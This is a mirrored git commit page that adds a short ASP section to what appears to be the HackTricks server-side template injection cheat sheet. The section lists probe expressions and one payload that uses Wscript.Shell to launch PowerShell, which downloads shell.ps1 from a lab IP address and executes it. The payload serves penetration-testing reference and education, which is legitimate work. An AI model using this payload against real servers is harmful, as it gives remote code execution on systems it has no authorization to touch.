mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-28 23:51:29 +00:00
GitBook: [#2986] No subject
This commit is contained in:
parent
8e9f19eec9
commit
6e5cd29dfd
1 changed files with 15 additions and 0 deletions
|
@ -796,6 +796,21 @@ ${x}
|
|||
* [https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-\(SSTI\)-in-ASP.NET-Razor/)
|
||||
* [https://www.schtech.co.uk/razor-pages-ssti-rce/](https://www.schtech.co.uk/razor-pages-ssti-rce/)
|
||||
|
||||
### ASP
|
||||
|
||||
* `<%= 7*7 %>` = 49
|
||||
* `<%= "foo" %>` = foo
|
||||
* `<%= foo %>` = Nothing
|
||||
* `<%= response.write(date()) %>` = \<Date>
|
||||
|
||||
```bash
|
||||
<%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %>
|
||||
```
|
||||
|
||||
#### More Information
|
||||
|
||||
* [https://www.w3schools.com/asp/asp\_examples.asp](https://www.w3schools.com/asp/asp\_examples.asp)
|
||||
|
||||
### Mojolicious (Perl)
|
||||
|
||||
Even if it's perl it uses tags like ERB in Ruby.
|
||||
|
|
Loading…
Reference in a new issue